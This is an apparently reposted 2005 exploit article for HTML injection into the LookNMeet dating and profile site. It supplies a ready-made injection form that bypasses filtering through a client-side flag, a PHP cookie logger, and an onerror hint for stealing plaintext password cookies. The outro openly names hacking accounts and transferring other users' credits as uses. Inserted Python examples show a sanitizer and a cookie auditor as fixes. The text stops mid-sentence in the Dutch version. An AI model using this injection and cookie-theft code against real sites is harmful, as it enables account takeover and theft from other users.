[Reposted] LOOKNMEET HTML INJECT EXPLOIT
Article author: PPC^Rebyte
*** SEE BELOW FOR DUTCH VERSION ***
*** DUTCH VERSION AT THE BOTTOM ***
( ENGLISH VERSION )
*** Status
__________
The vendor (AfterTheHype) was informed about this bug by Rebyte security
on 04 March 2005. Expect an updated service soon.
1* Intro
________
LookNMeet is a service from the vendor AfterTheHype for making your own profile
and meeting new people.
A bug in the service makes it possible to inject your own HTML code into
someone's guestbook or into your own blog, so you can make your blog or
someone's guestbook really special by injecting whatever HTML you like.
It should also be possible to steal someone's password, because the passwords
are stored in plain text in a cookie.
Earlier misuse of the bug caused LookNMeet to patch their service, but not
fully. You can still inject HTML code; you just can't inject <script> or
<iframe> tags -directly- anymore. Of course there are ways to work around
this...
What follows is an article about how we hacked LookNMeet profiles and made
our blog and guestbook messages really special.
2* Writing HTML Injection Script
________________________________
A simple HTML page using forms is sufficient to inject pure HTML into
LookNMeet. The page below reproduces the guestbook and blog forms and posts
them straight to the site's own endpoints; the hidden field RTEavailable=yes
(the "real text editor" flag in the comments below) is what lets the HTML in
the "descr" field through without being filtered.
Example Script:
- - - - - - - -
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-- LNMinject.html --
<html>
<head>
<title>LookNMeet HTML InjectoR * by PPC</title>
</head>
<body>
<b><font size="5" color="#FF0000">LookNMeet HTML InjectoR Xploit</font><br />
- by PPC -</b>
<br /><br /><font color="#888888">Warning: You have to be logged in to
LookNMeet and have Cookies enabled to use this xploit.</font>
<!-- FORM TO SIGN GUESTBOOK -->
<form action="http://www.looknmeet.be/members/gbook_sign.html" method="post">
<input type="hidden" name="submitted" value="true">
<input type="hidden" name="return" value="">
<table border="0">
<tr>
<td>
<hr align="left" width="550" /><b><font size="5">Inject To Guestbook</font>
</b><br /><br />
</td>
</tr>
<tr>
<td>
<!-- "LOOKID" HAS THE UNIQUE GUESTBOOK USER ID OF THE GUESTBOOK
WHERE WE WANT TO INJECT OUR HTML TO -->
Guestbook User ID: <input type="text" name="lookid" value=""
maxlength="100" size="50"><br />
Title: <input type="text" name="title" value="" maxlength="100" size="50">
<br /><br />HTML Code:<br />
<!-- "DESCR" IS THE HTMLCODE THAT WOULD -NORMALLY- GET FILTERED -->
<textarea wrap="soft" name="descr" rows="10" cols="60"></textarea> </td>
</tr>
<tr>
<td colspan="2">
<!-- WE CAN USE A 'REAL TEXT EDITOR' -
(NEEDED TO INJECT HTML) -->
<input type="hidden" name="RTEavailable" value="yes">
</td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td>
<input type="submit" name="cancel" value=" Annuleren ">
<input type="submit" name="finish" value=" Invoegen ">
</td>
</tr>
<tr>
</tr>
</table>
</form>
<!-- FORM TO WRITE INTO BLOG -->
<form action="http://www.looknmeet.be/owner/blog_add.html" method="post">
<input type="hidden" name="submitted" value="true">
<input type="hidden" name="return" value="">
<table border="0">
<tr>
<td>
<hr align="left" width="550" /><b><font size="5">Inject To Blog</font>
</b><br />
<br />
Mood: <select name="moodid">
<option value="0" selected>Neutral</option>
<option value="1">Sad</option>
<option value="2">Happy</option>
<option value="3">Mad</option>
</select>
</td>
</tr>
<tr>
<td>Title: <input type="text" name="title" value="" maxlength="100"
size="50"><br /><br />HTML Code:<br />
<!-- "DESCR" IS THE HTMLCODE THAT WOULD -NORMALLY- GET FILTERED -->
<textarea wrap="soft" name="descr" rows="10" cols="60"></textarea> </td>
</tr>
<tr>
<td colspan="2">
<!-- WE CAN USE A 'REAL TEXT EDITOR' -
(NEEDED TO INJECT HTML) -->
<input type="hidden" name="RTEavailable" value="yes">
</td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td>
<input type="submit" name="cancel" value=" Cancel ">
<input type="submit" name="finish" value=" Inject ">
</td>
</tr>
<tr>
</tr>
</table>
</form>
</body>
</html>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
3* Injecting Basic HTML
_______________________
Now you can inject simple HTML code using the exploit page you just wrote.
Just open the page you made, fill in the HTML code and submit the form.
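The form above works because the server lets a client-supplied hidden field (RTEavailable=yes) decide whether the "descr" field is filtered, and the filter the vendor added after the earlier misuse is a blacklist of <script> and <iframe> tags. The Python script below is an added example, not code from the original article or from AfterTheHype: store_entry_vulnerable is a hypothetical reconstruction of that server-side logic, and store_entry_hardened shows the fix, an allowlist sanitizer built on the standard library's html.parser that runs on every submission regardless of what the client claims. The allowlist, the function names and the sample submissions are constructed for this example; only the field names "descr" and "RTEavailable" come from the page.

```python
"""Added example (not part of the original advisory): why gating HTML filtering on a
client-supplied flag fails, and what a server-side allowlist sanitizer looks like."""
import re
from html import escape
from html.parser import HTMLParser

# Tags and attributes a guestbook/blog entry may legitimately contain (constructed allowlist).
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "a", "img", "font"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}, "font": {"color", "size"}}
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "iframe"}   # drop the tag and its inner text
SAFE_URL = re.compile(r"^(https?:|/)", re.IGNORECASE)  # absolute http(s) or root-relative only


class AllowlistSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; everything else is dropped or escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # >0 while inside a container whose content is discarded

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: the tag vanishes, its text is kept (escaped)
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # event handlers (onerror, onload, ...) never survive
            if name in ("href", "src") and not SAFE_URL.match((value or "").strip()):
                continue  # rejects javascript:, data:, vbscript: and bare relative paths
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        closer = " /" if tag in VOID_TAGS else ""
        self.out.append(f"<{tag}{''.join(kept)}{closer}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <img ... /> is handled like <img ...>

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is always re-escaped


def sanitize(html_fragment):
    parser = AllowlistSanitizer()
    parser.feed(html_fragment)
    parser.close()
    return "".join(parser.out)


# --- Hypothetical reconstruction of the pattern the advisory describes (vulnerable). ---
def store_entry_vulnerable(form):
    """The server skips its tag blacklist when the client claims a rich-text
    editor was used (RTEavailable=yes); even the blacklist only knows two tags."""
    descr = form.get("descr", "")
    if form.get("RTEavailable") == "yes":
        return descr                                   # stored verbatim
    return re.sub(r"</?(script|iframe)[^>]*>", "", descr, flags=re.IGNORECASE)


# --- Hardened: the client never decides whether sanitising happens. ---
def store_entry_hardened(form):
    return sanitize(form.get("descr", ""))


if __name__ == "__main__":
    # Constructed sample submission mirroring the advisory's form fields.
    payload = '<b>hi</b><img src="re.byte" onerror="PAYLOAD" />'
    print(store_entry_vulnerable({"descr": payload, "RTEavailable": "yes"}))
    print(store_entry_hardened({"descr": payload, "RTEavailable": "yes"}))
```

Run it directly to see the two outputs side by side: the vulnerable handler stores the constructed payload verbatim when RTEavailable is yes and, even in its filtering branch, strips only the two blacklisted tags, while the hardened handler ignores the flag and returns the fragment with event-handler attributes and non-http URLs removed.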
4* Stealing Cookies (passwords)
_______________________________
Every LookNMeet user's password is stored as plaintext in a cookie. With a
little script we should be able to write this cookie to a text file...
We could make a PHP file that logs the cookie of users who visit your blog
or a guestbook and stores it in a text file. To do this we need the
following file:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-- log.php --
<title>x</title>
<?
// $log is never assigned here: it is only populated from the request via
// register_globals (off by default since PHP 4.2, removed in PHP 5.4), so
// this file only works on a server that has that setting enabled.
echo $log;
$log = $log . "\n";
$fp=fopen("file.txt","a+");   // append the received cookie to the log file
fputs($fp,$log);
fclose($fp);
?>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Then we create a new empty file named "file.txt".
We also give "file.txt" full read and write access so there are no problems
when writing data to it (chmod 777).
Now we have to inject code into LookNMeet that passes the cookie on to
"log.php". Since LNM has already tightened its filtering by blocking
<script> and <iframe> tags, writing a working script has become harder,
but by trying things out you should be able to write one anyway.
(Try to f*ck around with <img src="re.byte" onerror="JAVASCRIPT" />)
You now have the password of everyone who visits the page you injected
the code into in "file.txt".
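The cookie half of this section rests on two server-side mistakes: the password itself is placed in a cookie, and the cookie carries no HttpOnly flag, so any script that runs on the page can read it through document.cookie. The Python below is an added example, not the advisory's or the vendor's code: issue_session_cookie_vulnerable reproduces that pattern with constructed cookie names, issue_session_cookie_hardened issues a random session token instead (storing only its hash server-side, with HttpOnly, Secure and SameSite set), and audit_set_cookie is a small checker that flags a Set-Cookie header missing those attributes. The session table, cookie names and function names are all assumptions made for the example.

```python
"""Added example (not the advisory's or the vendor's code): the cookie mistakes the
cookie-logging trick depends on, the corrected pattern, and a Set-Cookie auditor."""
import hashlib
import secrets
from http.cookies import SimpleCookie

# Server-side session table standing in for a database (constructed for the example).
# Keyed by the SHA-256 of the token so a leaked table does not yield usable cookies.
SESSIONS = {}

# Cookie names that indicate a credential is being shipped to the browser (constructed list).
CREDENTIAL_NAMES = {"pass", "password", "passwd", "pwd", "pw"}


def issue_session_cookie_vulnerable(username, password):
    """The pattern the advisory describes: username and plaintext password in cookies,
    with no HttpOnly/Secure flags. Returns the Set-Cookie header values."""
    c = SimpleCookie()
    c["user"] = username
    c["pass"] = password            # readable by any script that runs on the page
    return [morsel.OutputString() for morsel in c.values()]


def issue_session_cookie_hardened(username):
    """Issue an opaque random session token; the password never reaches the browser."""
    token = secrets.token_urlsafe(32)
    SESSIONS[hashlib.sha256(token.encode()).hexdigest()] = username
    c = SimpleCookie()
    c["sid"] = token
    c["sid"]["httponly"] = True     # not exposed via document.cookie
    c["sid"]["secure"] = True       # only sent over TLS
    c["sid"]["samesite"] = "Lax"    # not attached to most cross-site requests
    c["sid"]["path"] = "/"
    return c["sid"].OutputString()


def lookup_session(cookie_header):
    """Resolve a Cookie request header back to a username, or None."""
    c = SimpleCookie()
    c.load(cookie_header)
    if "sid" not in c:
        return None
    digest = hashlib.sha256(c["sid"].value.encode()).hexdigest()
    return SESSIONS.get(digest)


def audit_set_cookie(header_value):
    """Return a list of findings for one Set-Cookie value; an empty list means it passes."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    findings = []
    if name.lower() in CREDENTIAL_NAMES:
        findings.append(f"{name}: credential stored client-side")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure")
    if "samesite" not in attrs:
        findings.append(f"{name}: missing SameSite")
    return findings


if __name__ == "__main__":
    for header in issue_session_cookie_vulnerable("alice", "hunter2"):
        print(header, "->", audit_set_cookie(header))
    header = issue_session_cookie_hardened("alice")
    print(header, "->", audit_set_cookie(header))
```

The auditor reads one Set-Cookie value at a time, so it can be pointed at headers captured from a proxy or a server log; anything it returns for a session cookie is worth fixing, and a password-like cookie name is a finding on its own regardless of which flags are present.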
5* Outro
________
THE.END
You can use this exploit to:
- make your pages stand out by using pure HTML
* - hack LNM accounts
* - transfer credits from someone's account to yours
Greetings 2 everyone at Rebyte and the whole Belgian scene !!
-- PPC^Rebyte --
-- ppc respected as --
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
( DUTCH VERSION )
*** Status
__________
De uitgever (AfterTheHype) is over deze bug ge